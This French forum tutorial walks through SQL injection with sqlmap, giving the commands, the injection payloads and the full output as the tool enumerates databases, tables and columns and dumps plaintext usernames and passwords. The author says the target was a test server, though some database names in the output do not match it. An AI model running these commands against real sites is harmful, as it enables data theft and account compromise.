user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'
Vous n'êtes pas identifié(e).
- Contributions : Récentes | Sans réponse
#1 18-07-2014 18:41:04
- IceF0x
- #! Gourou Linux
[Tuto]Exemple d'exploitation SQL avec SQLmap sous backtrack 5 R1
== Présentation ==
Voici exemple d'exploitation SQL à l'aide de l'application SQLmap.
SQLmap est installé par défaut sur Backtrack 5 R1, mais je vous met le tutoriel d'installation au cas ou vous voudriez le tester sous d'autres Linux ou le mettre à jour.
Note de Inazo: Un gros défaut pour ces outils c'est la quantité de trace générer par les tests de requêtes, si l'attaque peut être simple avec sqlmap, il est mieux de privilégier de le faire à la main.
== Installation ==
C'est très simple vu que c'est codé en python il ne faut même pas compiler.
http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/d…
On extrait l'archive.
tar -xzvf sqlmap-0.9.tar.gzmv /pentest/database/sqlmap/==Usage==
On se rend dans le répertoire de sqlmap
cd /pentest/database/sqlmap/Et Nous lançons l'attaque sur le site à pentester.
python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbsNous attendons et à la question posé a un moment [Y/N] nous répondons N.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:19:54
[11:19:54] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:19:54] [INFO] testing connection to the target url
[11:19:56] [INFO] testing if the url is stable, wait a few seconds
[11:19:57] [INFO] url is stable
[11:19:57] [INFO] testing if GET parameter 'id' is dynamic
[11:19:58] [INFO] confirming that GET parameter 'id' is dynamic
[11:19:59] [INFO] GET parameter 'id' is dynamic
[11:19:59] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[11:19:59] [INFO] testing sql injection on GET parameter 'id'
[11:19:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:20:02] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:20:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:20:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[11:20:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:20:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:09] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:21:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:21:39] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:41] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:23:03] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:23:03] [INFO] fetching database names
[11:23:04] [INFO] the SQL query used returns 5 entries
[11:23:04] [INFO] retrieved: information_schema
[11:23:04] [INFO] retrieved: www_choseprentals_com
[11:23:05] [INFO] retrieved: www_chose_com
[11:23:05] [INFO] retrieved: www_chose_com_working
[11:23:06] [INFO] retrieved: www_sitetest_com
available databases [5]:
[*] information_schema
[*] www_choserentals_com
[*] www_chose_com
[*] www_chose_com_working
[*] www_sitetest_com
[11:23:06] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:23:06Nous regardons les tables.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com --tables
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:26:59
[11:26:59] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:26:59] [INFO] resuming injection data from session file
[11:26:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:26:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:27:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:27:00] [INFO] fetching tables for database 'www_sitetest_com'
[11:27:01] [INFO] the SQL query used returns 62 entries
[11:27:01] [INFO] retrieved: www_sitetest_com
[11:27:02] [INFO] retrieved: AssemblyInstructions
[11:27:02] [INFO] retrieved: www_sitetest_com
[11:27:03] [INFO] retrieved: BrandedList
[11:27:03] [INFO] retrieved: www_sitetest_com
[11:27:04] [INFO] retrieved: BrandedMapProducts
[11:27:04] [INFO] retrieved: www_sitetest_com
[11:27:05] [INFO] retrieved: CampaignHits
[11:27:05] [INFO] retrieved: www_sitetest_com
[11:27:06] [INFO] retrieved: CatMapProducts
[11:27:06] [INFO] retrieved: www_sitetest_com
[11:27:07] [INFO] retrieved: CatalogList
[11:27:07] [INFO] retrieved: www_sitetest_com
[11:27:08] [INFO] retrieved: Category
[11:27:08] [INFO] retrieved: www_sitetest_com
[11:27:09] [INFO] retrieved: CheckersMetrics
[11:27:09] [INFO] retrieved: www_sitetest_com
[11:27:10] [INFO] retrieved: Customers
[11:27:10] [INFO] retrieved: www_sitetest_com
[11:27:11] [INFO] retrieved: EJCustomers
[11:27:11] [INFO] retrieved: www_sitetest_com
[11:27:12] [INFO] retrieved: EJOrderItems
[11:27:12] [INFO] retrieved: www_sitetest_com
[11:27:13] [INFO] retrieved: EJOrders
[11:27:13] [INFO] retrieved: www_sitetest_com
[11:27:14] [INFO] retrieved: Email
[11:27:14] [INFO] retrieved: www_sitetest_com
[11:27:15] [INFO] retrieved: EmailList
[11:27:15] [INFO] retrieved: www_sitetest_com
[11:27:16] [INFO] retrieved: HomePagePics
[11:27:16] [INFO] retrieved: www_sitetest_com
[11:27:17] [INFO] retrieved: HomePageProducts
[11:27:17] [INFO] retrieved: www_sitetest_com
[11:27:18] [INFO] retrieved: HomePages
[11:27:18] [INFO] retrieved: www_sitetest_com
[11:27:19] [INFO] retrieved: LPBrandedList
[11:27:19] [INFO] retrieved: www_sitetest_com
[11:27:20] [INFO] retrieved: LPHomePages
[11:27:20] [INFO] retrieved: www_sitetest_com
[11:27:21] [INFO] retrieved: LPMetrics
[11:27:22] [INFO] retrieved: www_sitetest_com
[11:27:22] [INFO] retrieved: Model
[11:27:23] [INFO] retrieved: www_sitetest_com
[11:27:23] [INFO] retrieved: PageMetaData
[11:27:24] [INFO] retrieved: www_sitetest_com
[11:27:24] [INFO] retrieved: PhotoGallery
[11:27:25] [INFO] retrieved: www_sitetest_com
[11:27:25] [INFO] retrieved: PriceBook
[11:27:26] [INFO] retrieved: www_sitetest_com
[11:27:26] [INFO] retrieved: PriceBookLogos
[11:27:27] [INFO] retrieved: www_sitetest_com
[11:27:27] [INFO] retrieved: PriceBookMasterPriceList
[11:27:28] [INFO] retrieved: www_sitetest_com
[11:27:28] [INFO] retrieved: PriceBookPasswordRequest
[11:27:29] [INFO] retrieved: www_sitetest_com
[11:27:29] [INFO] retrieved: PriceBookProductGroups
[11:27:30] [INFO] retrieved: www_sitetest_com
[11:27:30] [INFO] retrieved: PriceBookReports
[11:27:31] [INFO] retrieved: www_sitetest_com
[11:27:31] [INFO] retrieved: PriceBookSpecialPriceList
[11:27:32] [INFO] retrieved: www_sitetest_com
[11:27:32] [INFO] retrieved: PriceBookUserMetrics
[11:27:33] [INFO] retrieved: www_sitetest_com
[11:27:33] [INFO] retrieved: PriceBookUsers
[11:27:34] [INFO] retrieved: www_sitetest_com
[11:27:34] [INFO] retrieved: ProductAccessoryPictures
[11:27:35] [INFO] retrieved: www_sitetest_com
[11:27:35] [INFO] retrieved: ProductFeatures
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:36] [INFO] retrieved: ProductLoadCapacity
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:37] [INFO] retrieved: ProductNewFeatures
[11:27:37] [INFO] retrieved: www_sitetest_com
[11:27:38] [INFO] retrieved: ProductNotes
[11:27:38] [INFO] retrieved: www_sitetest_com
[11:27:39] [INFO] retrieved: ProductPicturesByBrand
[11:27:39] [INFO] retrieved: www_sitetest_com
[11:27:40] [INFO] retrieved: ProductPicturesByCategory
[11:27:40] [INFO] retrieved: www_sitetest_com
[11:27:41] [INFO] retrieved: ProductRelatedModels
[11:27:41] [INFO] retrieved: www_sitetest_com
[11:27:42] [INFO] retrieved: ProductSpecifications
[11:27:42] [INFO] retrieved: www_sitetest_com
[11:27:43] [INFO] retrieved: ProductSymbols
[11:27:43] [INFO] retrieved: www_sitetest_com
[11:27:44] [INFO] retrieved: ProductWarnings
[11:27:44] [INFO] retrieved: www_sitetest_com
[11:27:45] [INFO] retrieved: Products
[11:27:45] [INFO] retrieved: www_sitetest_com
[11:27:46] [INFO] retrieved: ProductsMapModels
[11:27:46] [INFO] retrieved: www_sitetest_com
[11:27:47] [INFO] retrieved: RelatedLinks
[11:27:47] [INFO] retrieved: www_sitetest_com
[11:27:48] [INFO] retrieved: RentalCustomers
[11:27:48] [INFO] retrieved: www_sitetest_com
[11:27:49] [INFO] retrieved: RentalOrderDetails
[11:27:50] [INFO] retrieved: www_sitetest_com
[11:27:50] [INFO] retrieved: RentalOrders
[11:27:51] [INFO] retrieved: www_sitetest_com
[11:27:51] [INFO] retrieved: RentalUsers
[11:27:52] [INFO] retrieved: www_sitetest_com
[11:27:52] [INFO] retrieved: SiteParameters
[11:27:53] [INFO] retrieved: www_sitetest_com
[11:27:53] [INFO] retrieved: Transpage
[11:27:54] [INFO] retrieved: www_sitetest_com
[11:27:55] [INFO] retrieved: Users
[11:27:55] [INFO] retrieved: www_sitetest_com
[11:27:56] [INFO] retrieved: WebHeaders
[11:27:56] [INFO] retrieved: www_sitetest_com
[11:27:57] [INFO] retrieved: WebsiteBrands
[11:27:57] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteCategory
[11:27:58] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteContactInfo
[11:27:59] [INFO] retrieved: www_sitetest_com
[11:27:59] [INFO] retrieved: WebsiteModels
[11:28:00] [INFO] retrieved: www_sitetest_com
[11:28:00] [INFO] retrieved: WebsiteProducts
[11:28:01] [INFO] retrieved: www_sitetest_com
[11:28:01] [INFO] retrieved: Websites
[11:28:02] [INFO] retrieved: www_sitetest_com
[11:28:02] [INFO] retrieved: orderItems
[11:28:03] [INFO] retrieved: www_sitetest_com
[11:28:03] [INFO] retrieved: orders
Database: www_sitetest_com
[62 tables]
+---------------------------+
| AssemblyInstructions |
| BrandedList |
| BrandedMapProducts |
| CampaignHits |
| CatMapProducts |
| CatalogList |
| Category |
| CheckersMetrics |
| Customers |
| EJCustomers |
| EJOrderItems |
| EJOrders |
| Email |
| EmailList |
| HomePagePics |
| HomePageProducts |
| HomePages |
| LPBrandedList |
| LPHomePages |
| LPMetrics |
| Model |
| PageMetaData |
| PhotoGallery |
| PriceBook |
| PriceBookLogos |
| PriceBookMasterPriceList |
| PriceBookPasswordRequest |
| PriceBookProductGroups |
| PriceBookReports |
| PriceBookSpecialPriceList |
| PriceBookUserMetrics |
| PriceBookUsers |
| ProductAccessoryPictures |
| ProductFeatures |
| ProductLoadCapacity |
| ProductNewFeatures |
| ProductNotes |
| ProductPicturesByBrand |
| ProductPicturesByCategory |
| ProductRelatedModels |
| ProductSpecifications |
| ProductSymbols |
| ProductWarnings |
| Products |
| ProductsMapModels |
| RelatedLinks |
| RentalCustomers |
| RentalOrderDetails |
| RentalOrders |
| RentalUsers |
| SiteParameters |
| Transpage |
| Users |
| WebHeaders |
| WebsiteBrands |
| WebsiteCategory |
| WebsiteContactInfo |
| WebsiteModels |
| WebsiteProducts |
| Websites |
| orderItems |
| orders |
+---------------------------+
[11:28:03] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:28:03Nous allons checker la colonne Users pour l'exemple.
python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users --columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:30:38
[11:30:38] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:30:38] [INFO] resuming injection data from session file
[11:30:38] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:30:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:30:39] [INFO] fetching columns for table 'Users' on database 'www_sitetest_com'
[11:30:40] [INFO] the SQL query used returns 4 entries
[11:30:40] [INFO] retrieved: ID
[11:30:41] [INFO] retrieved: int(11)
[11:30:41] [INFO] retrieved: UserName
[11:30:42] [INFO] retrieved: varchar(255)
[11:30:42] [INFO] retrieved: Password
[11:30:43] [INFO] retrieved: varchar(255)
[11:30:43] [INFO] retrieved: Email
[11:30:44] [INFO] retrieved: varchar(255)
Database: www_sitetest_com
Table: Users
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| Email | varchar(255) |
| ID | int(11) |
| Password | varchar(255) |
| UserName | varchar(255) |
+----------+--------------+
[11:30:44] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:30:44Nous allons faire un simple test sur la base ID juste pour voir 
et laisser le suspens 
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C ID --dump
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:32:36
[11:32:37] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:32:37] [INFO] resuming injection data from session file
[11:32:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:32:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:32:38] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:32:38] [INFO] fetching columns 'ID' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:32:38] [INFO] the SQL query used returns 3 entries
[11:32:39] [INFO] retrieved: 1
[11:32:39] [INFO] retrieved: 2
[11:32:40] [INFO] retrieved: 3
Database: www_sitetest_com
Table: Users
[3 entries]
+----+
| ID |
+----+
| 1 |
| 2 |
| 3 |
+----+
[11:32:40] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:32:40] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:32:40Nous voyons que les identifiant des utilisateur sont 1, 2 et 3 ces chiffres on un signification, mais on ne va pas s'ent occuper maintenant.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C Password --dump
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:34:50
[11:34:51] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:34:51] [INFO] resuming injection data from session file
[11:34:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:34:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:34:52] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:34:52] [INFO] fetching columns 'Password' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:34:52] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:34:52] [INFO] the SQL query used returns 3 entries
[11:34:53] [INFO] retrieved: grissom
[11:34:54] [INFO] retrieved: robbi
[11:34:54] [INFO] retrieved: cab!lost
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| Password |
+----------+
| grissom |
| robbi |
| cab!lost |
+----------+
[11:34:54] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:34:54] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:34:54Nous voyons ici que le password de l'utilisateur 1 est grissom.
Passons aux noms d'utilisateurs
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C UserName --dump
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:40:23
[11:40:24] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:40:24] [INFO] resuming injection data from session file
[11:40:24] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:40:24] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:40:25] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:40:25] [INFO] fetching columns 'UserName' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:40:25] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:40:25] [INFO] the SQL query used returns 3 entries
[11:40:25] [INFO] retrieved: bryan
[11:40:26] [INFO] retrieved: robbi
[11:40:26] [INFO] retrieved: jesica
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| UserName |
+----------+
| bryan |
| robbi |
| jesica |
+----------+
[11:40:26] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:40:26] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:40:26Et voilà UserName : bryan PassWord : grissom
je précise que je n'ai pas utilisé SQLmap dans des condition réelle, mais sur un site faillible installé pour le test sur un serveur dédié au test.
Tout usage de ce logiciel à des fin autre que le test d'un site ne vous appartenant pas est punissable selon les loi en vigueur dans votre pays.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
#2 01-01-2016 11:02:07
- IceF0x
- #! Gourou Linux
Re : [Tuto]Exemple d'exploitation SQL avec SQLmap sous backtrack 5 R1
Ajouté au wiki: http://linuxtrack.net/wiki/doku.php?id=sqlmap
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne